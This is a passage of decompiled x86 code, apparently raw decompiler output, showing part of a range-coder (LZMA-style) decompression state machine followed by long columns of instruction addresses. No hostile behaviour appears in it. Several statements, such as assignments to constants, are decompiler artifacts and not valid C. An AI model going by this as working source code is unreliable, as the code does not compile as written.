								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                0x00406786
                                                0x0040678d
                                                0x00406793
                                                0x00406799
                                                0x00000000
                                                0x0040679d
                                                0x004067a9
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x00000000
                                                0x004067bf
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d4
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x0040681f
                                                0x00406822
                                                0x0040684a
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406824
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683c
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406893
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x00406898
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b5
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fb
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa3
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fd9
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x00000000
                                                0x00407195
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407001
                                                0x00407001
                                                0x00407004
                                                0x00407007
                                                0x00407007
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00000000
                                                0x004069b2
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406995
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x00000000
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be6
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf3
                                                0x00406bf6
                                                0x00406bf9
                                                0x00406bfc
                                                0x00406bff
                                                0x00406c01
                                                0x00406c08
                                                0x00406c09
                                                0x00406c0b
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406c19
                                                0x00406bca
                                                0x00406bcd
                                                0x00406bd0
                                                0x00406bda
                                                0x00000000
                                                0x00000000
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c55
                                                0x00406c58
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c34
                                                0x00406c37
                                                0x00406c3a
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406c4d
                                                0x00000000
                                                0x00000000
                                                0x00406c71
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c7b
                                                0x00406c7f
                                                0x00000000
                                                0x00000000
                                                0x00406c85
                                                0x00406c87
                                                0x00406c8b
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00000000
                                                0x00000000
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406ced
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cfd
                                                0x00000000
                                                0x00406cfd
                                                0x00406ce8
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00406d23
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d36
                                                0x00406d3b
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00406c1c
                                                0x00406c1c
                                                0x00406c1f
                                                0x00000000
                                                0x00000000
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f81
                                                0x00406f84
                                                0x00406f8e
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6b
                                                0x00406f6e
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x0040704f
                                                0x0040704f
                                                0x00000000
                                                0x0040704f
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x0040710c
                                                0x00000000
                                                0x00000000
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d62
                                                0x00406d64
                                                0x00406d64
                                                0x00406d65
                                                0x00406d68
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d80
                                                0x00000000
                                                0x00000000
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00000000
                                                0x00407065
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x00000000
                                                0x004071a1
                                                0x0040706f
                                                0x00407072
                                                0x00407075
                                                0x00407079
                                                0x0040707c
                                                0x00407082
                                                0x00407084
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708d
                                                0x0040708d
                                                0x00407091
                                                0x004070f1
                                                0x004070f4
                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x0040700d
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b1
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070e3
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
